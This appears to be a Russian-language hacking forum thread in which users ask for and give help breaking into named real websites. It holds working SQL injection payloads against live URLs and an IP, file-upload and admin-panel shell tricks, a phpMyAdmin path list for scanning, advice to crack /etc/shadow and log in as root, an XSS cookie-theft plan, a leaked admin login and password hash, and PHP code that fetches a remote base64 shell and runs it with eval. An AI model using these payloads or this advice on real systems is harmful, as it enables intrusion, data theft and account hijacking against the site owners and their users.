http://www.urvet.ru/index.php?categoryID='+or+1+group+by+concat((selec t+table_ name+from+information_schema.tables+where+table_ schema='z33576_shop'+limit+0,1),fl oor(rand(0)*2))having+min(0)+or+1+--+

http://www.urvet.ru/index.php?categoryID=1+or+1+group+by+concat((selec t+table_name+from+information_schema.tables+where+ table_schema=0x7a33333537365f73686f70+limit+0,1),f loor(rand(0)*2))having+min(0)+or+1--+

Помогите раскрутить!
Цитата:
http://zombie.cloud9crew.com/index.php/component/kunena/advsearch?q=hilfe&catids=1"


Еще актуально

Тут описание данного бага

http://seclists.org/fulldisclosure/2011/Feb/254

Если этот раскрутить не удается предположительно есть еще одна бага тут

http://zombie.cloud9crew.com/index.php?option=com_kunena&Itemid=86&func=announcement&do=

Описание тут

http://www.exploit-db.com/exploits/11279/

тут есть эксплойт

http://www.exploit-db.com/exploits/9408/

Из information_schema таблицы и колонки выводятся нормально, но вывод из таблиц не происходит. Какие есть альтернативы вот этому?

...5,6,login,pass+from+users+limit+0,1--

asql said:
Из information_schema таблицы и колонки выводятся нормально, но вывод из таблиц не происходит. Какие есть альтернативы вот этому?
...5,6,login,pass+from+users+limit+0,1--


Узнаешь table_schema > select 1,table_schema,3 from information_schema.tables where table_name='table_name'--

Выводишь данные > select 1,concat_ws(0x3a,username,password),3 from table_schema.table_name

Помню раньше на ачате была тема, а в ней предположительные диры где установлен pma, так вот искал и здесь и в гугле что то не нашел, может у кого есть?

Фараон said:
Узнаешь table_schema > select 1,
table_schema
,3 from information_schema.tables where table_name='
table_name
'--
Выводишь данные > select 1,concat_ws(0x3a,username,password),3 from
table_schema
.
table_name


спс, там их 6 оказалось)

Как можно залить шелл в e107 CMS если стоит ограничение через filetypes.php, т.е. через плагины/темы загрузить нельзя...

цель - слить бд

помогите

eD"]
[R]eD said:
Как можно залить шелл в e107 CMS если стоит ограничение через filetypes.php, т.е. через плагины/темы загрузить нельзя...
цель - слить бд
помогите


https://rdot.org/forum/showthread.php?t=3 пост Strilo4ka.

Если не понял, то просто создаешь форму у себя на компе:


PHP:


Отправить этот файл:

Название шелла!



Заходишь e107_admin/language.php?tools . Там редактируешь файл lan_banner.php вписав в него ");?> .

Затем через форму которую создал льешь шелл. Он будет по адресу http://[host]/[path]/e107_languages/shell.php

Lijzer said:
Помню раньше на ачате была тема, а в ней предположительные диры где установлен pma, так вот искал и здесь и в гугле что то не нашел, может у кого есть?




Code:
web/phpMyAdmin/
admin/pma/
admin/phpmyadmin/
admin/mysql/
phpmyadmin2/
mysqladmin/
mysql-admin/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.1/
phpMyAdmin-2.2.3/
phpMyAdmin-2.2.6/
myadmin/
phpMyA/
phpmyad/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.0-pl1/
phpMyAdmin-2.6.3-pl1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-rc1/
phpMyAdmin-2.6.2-rc1/
phpMyAdmi/
phpMyAdmin1/
phpMyAdmin2/
phpMyAdmin-2/
phpMyAdmin-2.10.0/
phpMyAdmin-2.3.0/
phpMyAdmin-2.3.1/
phpMyAdmin-2.3.2/
phpMyAdmin-2.3.3/
phpMyAdmin-2.3.4/
phpMyAdmin-2.3.5/
phpMyAdmin-2.3.6/
phpMyAdmin-2.3.7/
phpMyAdmin-2.3.8/
phpMyAdmin-2.3.9/
phpMyAdmin-2.4.0/
phpMyAdmin-2.4.1/
phpMyAdmin-2.4.2/
phpMyAdmin-2.4.3/
phpMyAdmin-2.4.4/
phpMyAdmin-2.4.5/
phpMyAdmin-2.4.6/
phpMyAdmin-2.4.7/
phpMyAdmin-2.4.8/
phpMyAdmin-2.4.9/
phpMyAdmin-2.5.0/
phpMyAdmin-2.5.1/
phpMyAdmin-2.5.2/
phpMyAdmin-2.5.3/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.5/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.7/
phpMyAdmin-2.5.8/
phpMyAdmin-2.5.9/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.1/
phpMyAdmin-2.6.2/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.4/
phpMyAdmin-2.6.5/
phpMyAdmin-2.6.6/
phpMyAdmin-2.6.7/
phpMyAdmin-2.6.8/
phpMyAdmin-2.6.9/
phpMyAdmin-2.7.0/
phpMyAdmin-2.7.1/
phpMyAdmin-2.7.2/
phpMyAdmin-2.7.3/
phpMyAdmin-2.7.4/
phpMyAdmin-2.7.5/
phpMyAdmin-2.7.6/
phpMyAdmin-2.7.7/
phpMyAdmin-2.7.8/
phpMyAdmin-2.7.9/
phpMyAdmin-2.8.1/
phpMyAdmin-2.8.2/
phpMyAdmin-2.8.3/
phpMyAdmin-2.8.4/
phpMyAdmin-2.8.5/
phpMyAdmin-2.8.6/
phpMyAdmin-2.8.7/
phpMyAdmin-2.8.8/
phpMyAdmin-2.8.9/
phpMyAdmin-2.9.1/
phpMyAdmin-2.9.2/
phpMyAdmin-3/
phpMyAdmin-4/
phpMyAds/
phpmyad-sys/

Фараон said:
https://rdot.org/forum/showthread.php?t=3 пост Strilo4ka.
Если не понял, то просто создаешь форму у себя на компе:

PHP:


Отправить этот файл:

Название шелла!



Заходишь e107_admin/language.php?tools . Там редактируешь файл lan_banner.php вписав в него
");?>
.
Затем через форму которую создал льешь шелл. Он будет по адресу http://[host]/[path]/e107_languages/shell.php


теперь не хаватает прав ((

видимо больше способов нету (

привет

есть сайт на DLE, версию не знаю

есть уязвимость вида


Code:
http://site.ru/index.php?subaction=userinfo&user=%2527

при подстановки sql запроса, все что я написал выводится в title, мб кто сталкивался с раскруткой такой inj

KREGI said:
привет
есть сайт на DLE, версию не знаю
есть уязвимость вида

Code:
http://site.ru/index.php?subaction=userinfo&user=%2527

при подстановки sql запроса, все что я написал выводится в title, мб кто сталкивался с раскруткой такой inj


Быть может это и не sql inj вовсе?

Isis said:
Быть может это и не sql inj вовсе?


хм, а что же?

KREGI said:
хм, а что же?


Да ничего, обычный вывод в тайтл.

Попробуй ввести туда


PHP:
alert(/1/)

Может xss будет

Isis said:
Да ничего, обычный вывод в тайтл.
Попробуй ввести туда

PHP:
alert(/1/)

Может xss будет


там защита от xss

eD"]
[R]eD said:
теперь не хаватает прав ((
видимо больше способов нету (


в пм скинь

KREGI said:
хм, а что же?


С чего же ты взял, что если запрос выводиться в title, то там SQLi?

Tigger said:
С чего же ты взял, что если запрос выводиться в title, то там SQLi?


ну не только в титл... помню просто читал про похожую скулю на дле... вот и подумалось...

Подскажите что за ошибка, каким способом можно раскрутить?

An error occurred

Page not found

Exception information:

Message: Invalid controller specified (about')

Stack trace:

#0 /opt/http/www/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))

#1 /opt/http/www/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()

#2 /opt/http/www/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()

#3 /opt/http/www/public/index.php(27): Zend_Application->run()

#4 {main}Request Parameters:

array (

'controller' => 'about\'',

'action' => 'union',

'select' => '1',

'module' => 'default',

)

SELECT ID, NicName, DateReg FROM a_Accounts WHERE ID=-1 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(USER(), 1,63), FLOOR(RAND(0)*2))) --

как получить group_concat(TABLE_SCHEMA) from information_schema.tables?

rootmd said:
SELECT ID, NicName, DateReg FROM a_Accounts WHERE ID=-1 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(USER(), 1,63), FLOOR(RAND(0)*2))) --
как получить group_concat(TABLE_SCHEMA) from information_schema.tables?




HTML:
-1+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+ 2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((SELECT+GRO UP_CONCAT(SCHEMA_NAME)+FROM+INFORMATION_SCHEMA.SCH EMATA),1,63),FLOOR(RAND(0)*2)))

Всем привет! Есть такая таблица на сервере.


Code:
CREATE TABLE IF NOT EXISTS `login` (
`id` int(11) unsigned NOT NULL auto_increment,
`userid` varchar(23) NOT NULL default '',
`user_pass` varchar(23) NOT NULL default '',
`mode` enum('one','two') NOT NULL default 'one',
`email` varchar(39) NOT NULL default '',
PRIMARY KEY (`id`),
KEY `name` (`userid`)
) ENGINE=MyISAM AUTO_INCREMENT=1000000;

И примерно такой SQL запрос:


INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', 'one', 'root@myhost.com')


При регистрации на сайте не фильтруется поле "mode":


INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', [SQL], 'root@myhost.com')


Возможно к уязвимому запросу добавить свой запрос?

Я пробовал подставить "two','root@myhost.com'); SELECT * FROM `login`; -- ", но получил ошибку:


Ошибка MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT * FROM `login`; -- ', 'root@myhost.com')' at line 1


Какие возможности открывает данная уязвимость?

Dynamic

/showpost.php?p=2582303&postcount=16477

Dynamic said:
Возможно к уязвимому запросу добавить свой запрос?
Я пробовал подставить
"two','root@myhost.com'); SELECT * FROM `login`; -- "
, но получил ошибку


Таким запросом вы никогда ничего и не добъетесь. Ну кроме ошибки.


Dynamic said:
INSERT INTO `login` (`userid`, `user_pass`, `mode`, `email`) VALUES ('root', 'toor', [SQL], 'root@myhost.com')


Предположим что поле email выбирается из базы где-то, то тогда в уязвимый параметр вводи:

', подзапрос)-- 1

Иначе можно спровоцировать ошибку, тоже много вариантов.

Redwood, спасибо за ссылку на пост.

Там говорится о том что мы можем вписать произвольные значения в базу в текущий запрос или спровоцировать ошибку duplicate entry и выводить инфу через нее. В моем случае я могу записать произвольное мыло при регистрации. А на счет "спровоцировать ошибку duplicate" у меня скорее всего не применимо. Потому что "on duplicate key update" срабатывает когда мы питаемся в поле "UNIQUE index or PRIMARY KEY" записать значение, которое уже есть в базе. У меня оно генерируется само(AUTO_INCREMENT). Верно?

~d0s~, email не выбирается из базы, его тоже вводит пользователь в форме регистрации.

Вы предлагаете заместо мыла передать вложенный SQL запрос? Если да, то напишите пожалуйста пример.

Dynamic said:
~d0s~
, email не выбирается из базы, его тоже вводит пользователь в форме регистрации.
Вы предлагаете заместо мыла передать вложеный SQL запрос? Если да, то напишите пожалуйста пример.


Какой смысл инсертить свои данные в базу, если они нигде не выбираются в итоге, вывода то все равно не будет! Вывод в ошибке вам в помощь.


Dynamic said:
Если нигде на сайте не выводится значение поля email, то мы ничего не можем сделать кроме как подмены мыла введенного при регистрации в форме. Верно?


Вам уже много раз сказали про вывод в ошибке. Раз вы приводили нам выплянутую майскулом ошибку синтаксиса в самом начале, то не вижу преград для проведения атаки.

~d0s~, в том то и дело, что вывода нету. Есть только регистрация аккаунта в игре. Функционала для того чтобы пользователь мог войти на сайте нету. Вопрос создавал с надеждой, что можно прикрепить свой SQL запрос(INSERT), чтобы вставить свои значения в другую таблицу(структура таблиц известна). Либо путем ошибок MySQL получать данные.

Если нигде на сайте не выводится значение поля email, то мы ничего не можем сделать кроме как подмены мыла введенного при регистрации в форме. Верно?

Dynamic said:
Если нигде на сайте не выводится значение поля email, то мы ничего не можем сделать кроме как подмены мыла введенного при регистрации в форме. Верно?


Вывод уязвимого поля на страницу, на вывод в ошибке не влияет.

Вывод отработает и при таком коде:


PHP:






UPD: Дополнил вышеприведенную ссылку методом выборки на основе временных задержек.

Немного странно.

Вот есть сайт с которого логин/пасс стащил

Админка: http://www.franchisedocuments.com/zen/admin/login.php

Логин: frandocs

Защита от нубов: 5a042913e5074bc846784dd2066456d2:26

Но вот когда вводим правильный логин/пасс не пишет что введено неправильно, но и не заходит.

В чем причина то?

Что неприятно, так это то что там СС быть могут, и на завершающем этапе такой облом.

Привет. Если я имею полный доступ к /etc на сервере, что мне это дает?

Спасибо

stasiliy said:
Привет. Если я имею полный доступ к /etc на сервере, что мне это дает?
Спасибо


Узнай инклюд это или нет. Если инклюд, то читай статьи по LFI\RFI (тыц (http://www.xakep.ru/post/49508/default.asp?print=true) к примеру). Если читалка, то изучи сорцы сайта.


Fooog said:
Немного странно.
Вот есть сайт с которого логин/пасс стащил
Админка: http://www.franchisedocuments.com/zen/admin/login.php
Логин: frandocs
Защита от нубов: 5a042913e5074bc846784dd2066456d2:26
Но вот когда вводим правильный логин/пасс не пишет что введено неправильно, но и не заходит.
В чем причина то?
Что неприятно, так это то что там СС быть могут, и на завершающем этапе такой облом.


Вполне возможно, что уже кто-то похекал и поломал сайт.

Либо это не та админка или не те данные.

stasiliy said:
Привет. Если я имею полный доступ к /etc на сервере, что мне это дает?
Спасибо


читай /etc/shadow (или /etc/master.passwd), расшифровывай пассы (рут само собой в приоритете), коннекться по ssh и властвуй

Привет всем... Нужна помощь с SQL Injection

Запросы:

1. http://site.com/xmlstats.php?affid=100&dt='

2. http://site.com/xmlstats.php?affid=100&dt=1'

3. http://site.com/xmlstats.php?affid=100&dt=1' OR 1=1

Ошибки:

1.

XML Parsing Error: syntax error

Location: http://site.com/xmlstats.php?affid=100&dt=%27

Line Number 1, Column 22:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and '' 23:59:59'' at line 5

---------------------^

2.

XML Parsing Error: syntax error

Location: http://site.com/xmlstats.php?affid=100&dt=1%27

Line Number 1, Column 22:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00' and '1' 23:59:59'' at line 5

---------------------^

3.

XML Parsing Error: syntax error

Location: http://site.com/xmlstats.php?affid=100&dt=1%27%20OR%201=1

Line Number 1, Column 22:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'OR 1=1 00:00:00' and '1' OR 1=1 23:59:59'' at line 5

---------------------^

Есть ли возможность заюзать SQL Inection в данном случае? На месте &dt должна быть дата например 2011-03-19

Как заливается шелл в

Coppermine Photo Gallery v1.5.x

Доступ в админку есть.

в базе нашел пас ид №1 нашел админку а войти не могу так как логина нет. что делать подскажыте????

Konfuz™ said:
Есть ли возможность заюзать SQL Inection в данном случае? На месте &dt должна быть дата например 2011-03-19


Есть. Без особых даже проблем. Кури маны.


Oro4imaru said:
в базе нашел пас ид №1 нашел админку а войти не могу так как логина нет. что делать подскажыте????


Искать логин в другой таблице как вариант. id же тебе известен.

не могу заюзать SQL Inj


Помоему там ограничение на длину запроса. потому и не получается ничего)

Есть SQL Injection

http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--

Меняем LIMIT 0,1 - получаем 158 пользователей...

http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--

Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?

Konfuz™ said:
Есть SQL Injection
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Меняем LIMIT 0,1 - получаем 158 пользователей...
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?


http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1

http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1


я уже увидел что всего 3 пароля, как такое может быть?

Какие есть варианты? Пароли лежат где-то еще?

Konfuz™ said:
я уже увидел что всего 3 пароля, как такое может быть?


Колонке не присвоено not null при создании. Следовательно, они могут быть пустыми.

Есть вот такие штуки:


PHP:
Warning: include(service.php\') [function.include]: failed to open stream: No such file or directory in /home/corpxcoz/public_html/321.co.za/home.php on line 111

-------

Warning: include(templates/default/testimonials_browse.php\') [function.include]: failed to open stream: No such file or directory in /home/pmagic/public_html/helpdesk/index.php on line 82

----------------

Warning: include(/homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/templates/default/knowledgebase_browse.php\') [function.include]: failed to open stream: No such file or directory in /homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/index.php on line 85



И т.д.

Подкинье брутер etc/passwd, passwd%00, который перебирает пути ../, ../../, ../../../ и т.д на валид.

Желательно на перле или питоне. Спасибо.

DCrypt said:
Подкинье брутер etc/passwd, passwd%00


Посчитай кол-во каталогов от корня до исходного файла исходя из ошибки.

Не пропускает запросы, где есть union select from. Просто union select - все норм, при добавление from - еррор. /*!union*/ /*!select*/ /*!from*/ не прокатило /*!union+select*/ fromтоже. Изменение регистров не вариант. Есть какие-нибудь предложения?

Проблема решена.

Обошел так:

uni%00on sele%00ct from

не могу найти логин админа в панель в базах нет, автор новостей скрыт, на сайте не нашел ?????

ну как бы не всегда логин с паролем в базе есть

ну как бы не всегда логин с паролем в базе есть


ну да я понимаю подскажите куда дальше рыть

Oro4imaru said:
ну да я понимаю подскажите куда дальше рыть


Кидай в личку скуль (или что у тебя там), выдру.

парни проблемка

обычная скуль но точку юзать нельзя

возможно обратиться к information_schema.columns например?

Moriarty said:
Народ, нужна литература по двойным запросам! Статьи, посты и т.п.


/showpost.php?p=497033&postcount=10 // два запроса с одним параметром

/showpost.php?p=1047515&postcount=48 // все вместе

Moriarty said:
Как...


Античатопедия продолжается

id=-1+UNION+SELECT+File_Priv+from+mysql.user+where+use r='юзер'

помогите залить шелл пхп инъекция


Code:
http://www.uwua375.org/?page=http://google.ru

Compton said:
помогите залить шелл пхп инъекция

Code:
http://www.uwua375.org/?page=http://google.ru



Это фрейм=\

file('dir/'.$.'.ext'); годится только для локального "инклуда"? расширение нолем отсекаю, конфиг читаю, но чую что шелом тут не пахнет. поправьте меня если я не прав.

Чакэ said:
file('dir/'.$.'.ext'); годится только для локального "инклуда"? расширение нолем отсекаю, конфиг читаю, но чую что шелом тут не пахнет. поправьте меня если я не прав.


Это вообще не инклуд, это читалка

Читать файлы можешь, но подключать не можешь.

Так то вот.

Помогите разобраться с XSS вот вроде нашел тут токо хз правильная ли она http://play.ukr.net/videos/search? уязвимое поле поиск кода пишу ">alert() сам посмотрите что выдаст)). Это XSS ваще? Если да обесните плиз как ее использывать, а то читаю мануалы не оч понял))

SeNaP said:
Это вообще не инклуд, это читалка
Читать файлы можешь, но подключать не можешь.
Так то вот.


я так и думал. но всё же решил уточнить)

Fild3y said:
Помогите разобраться с XSS вот вроде нашел тут токо хз правильная ли она http://play.ukr.net/videos/search? уязвимое поле поиск кода пишу ">alert() сам посмотрите что выдаст)). Это XSS ваще? Если да обесните плиз как ее использывать, а то читаю мануалы не оч понял))


xss, только там strip_tags херачит

Moriarty said:
Кто-нибудь помнит в какой версии было такое окно???
http://img810.imageshack.us/img810/7981/screenshot2kt.th.png (http://img810.imageshack.us/i/screenshot2kt.png/)


2.3.x

Fooog said:
Немного странно.
Вот есть сайт с которого логин/пасс стащил
Админка: http://www.franchisedocuments.com/zen/admin/login.php
Логин: frandocs
Защита от нубов: 5a042913e5074bc846784dd2066456d2:26
Но вот когда вводим правильный логин/пасс не пишет что введено неправильно, но и не заходит.
В чем причина то?
Что неприятно, так это то что там СС быть могут, и на завершающем этапе такой облом.


admin_id:admin_name:admin_email:admin_pass:admin_l evel

1:frandocs:sales@franchisedocuments.com:5a042913e5 074bc846784dd2066456d2:26:1

5a042913e5074bc846784dd2066456d2 -> md5

Fild3y said:
Помогите разобраться с XSS вот вроде нашел тут токо хз правильная ли она http://play.ukr.net/videos/search? уязвимое поле поиск кода пишу ">alert() сам посмотрите что выдаст)). Это XSS ваще? Если да обесните плиз как ее использывать, а то читаю мануалы не оч понял))


Там как уже сказали фильтр, но в таких ситуациях нельзя разочаровываться, по адресу http://freemail.ukr.net/q/password_recovery есть рабочая XSS


Code:
">alert(/xss/)

Что с этим можно сделать?

Можно найти более красиваое место, написать там посредством XSS код который будет красть куки, через сниффер, и потом входить на этот сьайт под чужими акками без ввода пароля, ну это в лучшем случае))

Под красивым местом подразумевается статическая страница которую могут открыть люди и оставить там свои куки для тебя

P.S. Посредством этой XSS можно взломать(угнать куки) любой аккаунт с freemail.ukr.net, вот что можно с этим сделать))

как сделать select into outfile '/var/www/site/ae.txt' если фильтрируется ' и все это после 400 колонок

rootmd said:
как сделать select into outfile '/var/www/site/ae.txt' если фильтрируется ' и все это после 400 колонок


я не труъ хакир, но вроде тут нечего не поделаешь, т.к. при записи, нужно указывать путь к файлу именно в ' '.

пробуй через двойной запрос.

Moriarty said:
Интересуют маны по рутанью (*nix).


Dimi4: Мануал новичкам(Рутанье) (https://antichat.live/threads/151993/)

Столкнулся с проблемой в админке есть функция загрузки картинок в галерею, ресайза нет, но добавляется расширение jpeg, и проверяется mime на image, только в одном случае, когда льешь ex.php.jpeg добавляется ex.txt. В галереи отображается картинка как надо, а когда по прямому пути, то исходник картинки+шелла. Может кто сталкивался, как обойти.

p.s. инклуда нет

Moriarty said:
По движку ориентируйся. Галерея - наверняка модуль.


Двиг самопис, блок по белому списку.

Lijzer said:
Двиг самопис, блок по белому списку.


А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?

Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.

И вот такие названия пробуй:

x3k.php.blablajpg

x3k.php%00.jpeg

Tigger said:
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg

x3k.php%00.jpeg



Нуль байт - уж слишком старомодно

скорее всего защита от такого есть

даже в самописном движке

Tigger said:
А если отправлять с белым разрешением (x3k.jpg), то с каким именем она зальеться на сервер? С таким же, или добавляется еще jpeg o_0 ?
Попробуй отправить x3k.jpeg.php подделав Content-Type на Image.
И вот такие названия пробуй:
x3k.php.blablajpg

x3k.php%00.jpeg



Четыре расширения в белом списке gif,jpg,jpeg,png. Льешь jpg>jpg на выходе.

Подделывал Content-Type на image/jpeg выкинуло ошибку.

Нижнии два варианта при первоначальном попадании в админку, не помогли

Жумла

Права доступа на каталоги


administrator/backups/ Недоступен для записи
administrator/components/ Недоступен для записи
administrator/modules/ Недоступен для записи
administrator/templates/ Недоступен для записи
components/ Недоступен для записи
images/ Недоступен для записи
images/banners/ Недоступен для записи
images/stories/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/editors/ Недоступен для записи
mambots/editors-xtd/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи
media/ Недоступен для записи
modules/ Недоступен для записи
templates/ Недоступен для записи
Каталог кэша /var/www/forcekir/data/www/kadetstvo.info/cache/ Недоступен для записи
Каталог сессий /var/www/forcekir/data/mod-tmp/
Доступен для записи


Можно как-нить шелл залить? >_

да, ставиь в пхп модуль (через админку)


Code:
if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA")
{
echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt"))));
die();
}

что делать пробую залить шелл шелл.пшп.джпег но его в постледствие залива переименовывает на какой нить нв3-1.джпег и он не запускается! как обойти или мож я чето не так делаю??

rootmd said:
да, ставиь в пхп модуль (через админку)

Code:
if($_SERVER['REMOTE_ADDR']="TVOI_IP_VNESHKA")
{
echo(eval(base64_decode(file_get_contents("http://iahacker.ru/TVOI_BASE64_ENKODIROVANII_SHELL.txt"))));
die();
}



куда\что именно? модули залить нельзя

[QUOTE="None"]
Жумла
Права доступа на каталоги
Цитата:
administrator/backups/ Недоступен для записи
administrator/components/ Недоступен для записи
administrator/modules/ Недоступен для записи
administrator/templates/ Недоступен для записи
components/ Недоступен для записи
images/ Недоступен для записи
images/banners/ Недоступен для записи
images/stories/ Недоступен для записи
language/ Недоступен для записи
mambots/ Недоступен для записи
mambots/content/ Недоступен для записи
mambots/editors/ Недоступен для записи
mambots/editors-xtd/ Недоступен для записи
mambots/search/ Недоступен для записи
mambots/system/ Недоступен для записи
media/ Недоступен для записи
modules/ Недоступен для записи
templates/ Недоступен для записи
Каталог кэша /var/www/forcekir/data/www/kadetstvo.info/cache/ Недоступен для записи
Каталог сессий /var/www/forcekir/data/mod-tmp/ Доступен для записи
Можно как-нить шелл залить? >__